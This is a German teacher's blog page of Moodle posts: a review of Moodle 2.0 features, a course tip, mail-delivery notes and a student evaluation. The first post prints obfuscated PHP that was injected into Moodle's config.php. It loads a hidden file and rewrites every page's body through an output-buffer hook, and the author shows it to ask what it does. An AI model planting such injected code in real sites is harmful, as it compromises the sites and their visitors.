Moodlehack – kann das jemand decodieren?

Frü­he­re Ver­sio­nen von Mood­le, ins­be­son­de­re die 1.8er-Reihe beka­men des Öfte­ren Besuch (neue­re 1.8er-Versionen,. z.B. 1.8.9 sind gefixt), wobei die­ser Code in die config.php ein­ge­schleust wur­de (hier unvoll­stän­dig dar­ge­stellt – hier Voll­text):

if(function_exists(‚ob_start‘)&&!isset($GLOBALS[’sh_no‘])){$GLOBALS[’sh_no‘]=1;if(file_exists(‚/path/to/moodle/lang/be/help/resource/type/mdl_utf.php‘)){include_once(‚/home/www/web10/html/moodle/lang/be/help/resource/type/mdl_utf.php‘);if(function_exists(‚gml‘)&&!function_exists(‚dgobh‘)){if(!function_exists(‚gzdecode‘)){function gzdecode($R20FD65E9C7406034FADC682F06732868){$R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));$R60169CD1C47B7A7A85AB44F884635E41=10;$R0D54236DA20594EC13FC81B209733931=0;if($R6B6E98CDE8B33087A33E4D3A497BD86B&4){$R0D54236DA20594EC13FC81B209733931=unpack(‚v‘,substr($R20FD65E9C7406034FADC682F06732868,10,2));$R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1];$R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&8){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&16){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&2){$R60169CD1C47B7A7A85AB44F884635E41+=2;}$RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE){$RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868;}return $RC4A5B5E310ED4C323E04D72AFAE39F53;}}function dgobh($RDA3E61414E50AEE968132F03D265E0CF){Header(‚Content-Encoding: none‘);$R3E33E017CD76B9B7E6C7364FB91E2E90=gzdecode($RDA3E61414E50AEE968132F03D265E0CF);if(preg_match(‚/\<body/si‘,$R3E33E017CD76B9B7E6C7364FB91E2E90)){return preg_replace(‚/(\<body[^\>]*\>)/si‘,‘$1‘.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);}else{return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;}}ob_start(‚dgobh‘);}}}

Der Code ist schon­mal so mies, dass das Mood­le­sys­tem nach dem Ein­schleu­sen teil­wei­se nicht mehr funk­tio­niert und so der Hack schnell erkannt ist. Mich wür­de inter­es­sie­ren, was der Code genau bezwe­cken soll, damit man etwas über die Moti­va­ti­on des „Angrei­fers“ erfährt. Will er nur spam­men? Will er Daten klau­en? Ist die Daten­bank nach einem erfolg­rei­chen Hack noch zu gebrau­chen? Auf jeden Fall wird auf die imap- und mcrypt-Funk­tio­na­li­tät von PHP zurück­ge­grif­fen…

Moodle 2.0 – What’s new?

Erst­mal eine klei­nes Video von Lutz Ber­ger dazu (via Twit­ter durch Heinz Kret­tek):

… und jetzt natür­lich mein Kom­men­tar zu zwei aus­ge­wähl­ten Neue­run­gen:

1. Beding­te Akti­vi­tä­ten (con­di­tio­nal activi­ties)
Bis­her war es so, dass eine Schü­ler inner­halb eines Mood­le­kur­ses alle Akti­vi­tä­ten sehen konn­te, die für ihn durch den Kurs­er­stel­ler nicht ver­bor­gen wor­den oder durch das Benut­zer­ma­nage­ment (Grup­pen, Grup­pie­run­gen) ihm nicht zugäng­lich waren. Nun­mehr sind Din­ge mög­lich, wie
  • das nächs­te Doku­ment kannst du erst lesen, wenn du vor­her dem Link x gefolgt bist“
  • wenn du im Test 40% erreicht, bekommst du Auf­ga­be 1 (leicht) und wenn du 80% erreichst, bekommst du Auf­ga­be 2 (schwer)“
  • Es sieht zusätz­lich so aus, als ob unter der Ober­flä­che ein Logik­sys­tem wer­kelt, also even­tu­ell auch Kon­struk­te wie logisch AND, XOR, OR, NOT mög­lich wer­den
Mein Kom­men­tar:
Mit eigen­stän­di­gem Ler­nen und indi­vi­du­el­ler Frei­heit im eige­nen Lern­pro­zess hat das für mich nicht so viel zu tun. Es kann hart ver­drah­tet wer­den, wie ich zu ler­nen habe. Viel­leicht ver­ste­he ich Link 1 ja erst in Zusam­men­hang mit Text A, den ich aber vor­her gar nicht sehen kann. Ich fürch­te mich davor, das vie­le Leh­ren­de genau die­ses Fea­ture dafür nut­zen wer­den, tra­di­tio­nel­len Unter­richt noch stär­ker 1:1 auf Mood­le abzu­bil­den und stren­ge Lern­we­ge vor­zu­ge­ben. Zudem haut die­ses Fea­ture ja in die Ker­be der „glei­cher Inhalt, glei­che Chan­cen, Leh­ren­den­ent­las­tung durch gleich­schrit­ti­ge Zusammenarbeit“-Bewegung. Da ver­kennt die Tech­nik in mei­nen Augen ein­mal mehr die Psy­cho­lo­gie. Das Zwi­schen­mensch­li­che muss stim­men, dann fin­det Zusam­men­ar­beit statt. Dann kom­men die Tools – aber es ist ja schön, dass das schon klappt bzw. das Tool schon da wäre. Ach ja – unnö­tig zu erwäh­nen, dass Mood­le jetzt „end­lich“ weiß, wie weit jeder Schü­ler mit sei­nem Lern­weg ist und das als Lern­be­richt aus­spuckt. Wer ein sol­ches Kon­troll­in­stru­ment braucht und mit den dar­auf gewon­ne­nen Ergeb­nis­sen und Daten bei sei­nen gan­zen SuS indi­vi­du­ell pro­duk­tiv umge­hen kann – ein Pri­vat­le­ben dürf­te er dann nicht mehr haben. Wer es nicht kann, muss sich sagen las­sen: Daten­spar­sam­keit? Was war das noch­mal?
Die Geschich­te mit den Tests und der beding­ten Ver­zwei­gung fin­de ich hin­ge­gen gut und kann mir das bei The­men vor­stel­len, wo Mood­le kom­plett den Leh­ren­den sub­sti­tu­iert (d.h. bei rei­nen E‑Lear­ning-Kur­sen wie es z.B. Sco­yo & Co. vor­ma­chen).

2. Schnitt­stel­len zu exter­nen Sys­te­men
Mood­le wird ver­stärkt Daten mit exter­nen Sys­te­men aus­tau­schen kön­nen, deren API frei ver­füg­bar ist, z.B. You­Tube, flickr, Alfres­co, Maha­ra, Blogs etc.. Ich kann z.B. als Schü­ler eine ein­ge­reich­te Auf­ga­be direkt per Klick in mein Maha­ra-Port­fo­lio über­tra­gen – ich muss das wohl doch ein­mal kon­fi­gu­rie­ren… Ich kann als Kurs­er­stel­ler z.B. You­Tube-Vide­os kom­for­ta­bel über einen neu­en Edi­tor (TinyMCE) per Klick ein­bin­den ohne die jetzt not­wen­di­ge Code­ko­pie­re­rei.

Kom­men­tar:
Ich fin­de die­sen Schritt abso­lut wich­tig und ein wirk­li­ches Novum. Es erleich­tert auch uner­fah­re­nen KuK das Erstel­len von mul­ti­me­di­al anspre­chen­den Kur­sen. Es ermög­licht, vor­han­de­ne Web­res­sour­cen unkom­pli­ziert zu nut­zen ohne Inhal­te dop­pelt vor­hal­ten zu müs­sen. Gera­de auf die Kom­bi­na­ti­on mit Blogs freue ich mich. Wenn es beim Maha­ra­ex­port auf dem bis­he­ri­gen Stand blei­ben soll­te (nur Datei­en kön­nen kopiert wer­den), wäre es ent­täu­schend. Span­nend wird es dadurch, wenn z.B. Bei­trä­ge im eige­nen Mood­leb­log mit allen Datei­en ver­öf­fent­lich wer­den könn­ten, z.B. nach Word­Press oder Maha­ra. Lei­der gibt es in Mood­le stan­dard­mä­ßig noch gar nicht so vie­le Orte, an denen Nut­zer eige­nen Con­tent erstel­len kön­nen. Da arbei­ten die bestimmt aber noch dran – sonst wäre die Maha­ra­kopp­lung etwas „dünn“ vom Ertrag. Auf jeden Fall soll­te man jetzt aber schon dar­auf ach­ten, dass das ein­mal ver­wen­de­te CMS an einer Insti­tu­ti­on eine mit Mood­le kom­pa­ti­ble API auf­weist… Das könn­te nicht kurz- aber mit­tel­fris­tig span­nend wer­den.

Wei­te­re Neue­run­gen
Ganz viel soll sich auch hin­sicht­lich der Benut­zer­freund­lich­keit ändern. Ob der Rück­stand Mood­les (Web 2.0, Ajax kommt da jetzt ja erst all­mäh­lich) zu ande­ren Sys­te­men in die­ser Hin­sicht auf­ge­holt wer­den kann, bleibt abzu­war­ten. Ich sehe sehr gespannt den geplan­ten Ver­ein­fa­chun­gen bei der Bedie­nung des Rech­te­sys­tems ent­ge­gen. Nicht, dass ich das Rech­te­sys­tem je gebraucht hät­te, aber viel­leicht fällt dadurch ein Teil der Fra­gen auf Moodle.org weg, die dann durch Fra­gen zum Logik­sys­tem bei den „Con­di­tio­nal Activi­ties“ ersetzt wer­den.
Wer noch mehr über Mood­le 2.0 wis­sen möch­te, sei auch den oben ver­link­ten You­Tube-Film ver­wie­sen – und vor allem auch noch auf ande­re Mei­nun­gen zu den neu­en Fea­tures als auf mei­ne…

Sprachgeschichte – Moodlekurs

Ich möch­te auf einen aus mei­ner Sicht inhalt­lich her­vor­ra­gen­den Mood­le­kurs hin­wei­sen, der für den einen oder ande­ren nie­der­säch­si­schen Leh­ren­den im Kon­text des Schwer­punkt­the­mas „Die deut­sche Spra­che der Gegen­wart“ inter­es­sant sein könn­te. Tho­mas Rau hat ihn erstellt. Er eig­net sich durch­aus auch zum Selbst­stu­di­um für SuS. Im Gegen­satz zu dem dazu­ge­hö­ri­gen Blog­bei­trag gibt es gleich – sehr leh­rer­freund­lich – die Lösun­gen zu den Auf­ga­ben mit dazu. Auch die Gra­fi­ken sind etwas anspre­chen­der und in bes­se­rer Qua­li­tät vor­han­den. Den Kurs kann man hier als Mood­le­si­che­rungs­da­tei her­un­ter­la­den.

MME – Moodle Mail Essentials

Aus Mood­le­sys­te­men wer­den vie­le Mails ver­schickt:

  • Mails bei neu­en Foren­bei­trä­gen
  • Mails nach Benutz­er­re­gis­trie­run­gen
  • Mails für den Admin nach Back­u­pläu­fen
  • usw.

Je nach Grö­ße des Mood­le­sys­tems kön­nen das sehr vie­le Mails sein – z.B. wenn der Admin im Nach­rich­ten­fo­rum eine neue Nach­richt schreibt und alle Nut­zer des Sys­tems die­ses Forum abon­niert haben. Oft macht man dabei am Anfang die Erfah­rung, dass ein Teil die­ser Mails nicht ankommt. Dar­an ist sehr oft mit­nich­ten Mood­le schuld. Eini­ge Anbie­ter schie­ben zusätz­lich die Schuld auf Free­mail­diens­te, bei denen die Mails „aus uner­find­li­chen Grün­den“ im Spam­ord­ner lan­den wür­den. Die Grün­de sind in den sel­tens­ten Fäl­len uner­find­lich, son­dern las­sen sich durch eine Ana­ly­se der betref­fen­den Mail sehr leicht ermit­teln. Es gibt also Aspek­te des Mail­pro­blems, die der Mood­le­ad­min lösen kann und es gibt Aspek­te, die nur der Pro­vi­der zu rich­ten ver­mag.

Wei­ter­le­sen

Riecken lässt evaluieren

… natür­lich mit Mood­le.

Wah­rung der Anony­mi­tät

Ich habe mir über mein allen frei zur Ver­fü­gung ste­hen­des Tool ein paar Zufalls-IDs (50 für 23 TN) gene­riert, über den CVS-Import in Mood­le inte­griert (das geht direkt ohne Kon­ver­tie­rung) und für die SuS aus­ge­druckt. Die resul­tie­ren­de Lis­te wur­de lieb­los in Strei­fen geschnit­ten und jeder aus dem Kurs konn­te sich dann einen Strei­fen mit Zugangs­da­ten zie­hen.

Kon­zep­ti­on in Mood­le

Ich habe extra für die­se Umfra­ge einen eige­nen Kurs mit nur einer Feed­back-Akti­vi­tät ange­legt. Die­ser Kurs wur­de durch einen Zugangs­schlüs­sel ver­sie­gelt, den ich erst unmit­tel­bar vor der Umfra­ge den SuS mit­ge­teilt habe.

Arbeits­auf­trag für die SuS

Stellt euch vor, Ihr hät­tet noch ein­mal Unter­richt bei Herrn Riecken, d.h. der gan­ze Kurs fin­ge noch ein­mal von vor­ne an. Beant­wor­tet die Fra­gen so, dass die Beant­wor­tung euch in die­ser Situa­ti­on etwas genützt hät­te.“

Ich wür­de ergän­zen (das habe ich lei­der nicht gemacht):

Legt dabei euren per­sön­li­chen Bewer­tungs­maß­stab an. Nehmt die Beant­wor­tung nicht in Rela­ti­on zu ande­ren Lehr­kräf­ten vor.“

Die Ergeb­nis­se

Befragt wur­de ein 13er Kurs auf grund­le­gen­dem Niveau., der jetzt ins Abitur geht und 23 Kurs­mit­glie­der  umfass­te. Ich ver­öf­fent­li­che hier nicht alle Fra­gen, weil mir ein Groß­teil nicht „gehört,“ son­dern von ande­ren Per­so­nen ent­wi­ckelt wor­den ist. Ich tref­fe daher nur eine klei­ne emo­tio­na­le Aus­wahl.

Wei­ter­le­sen

1 4 5 6 7 8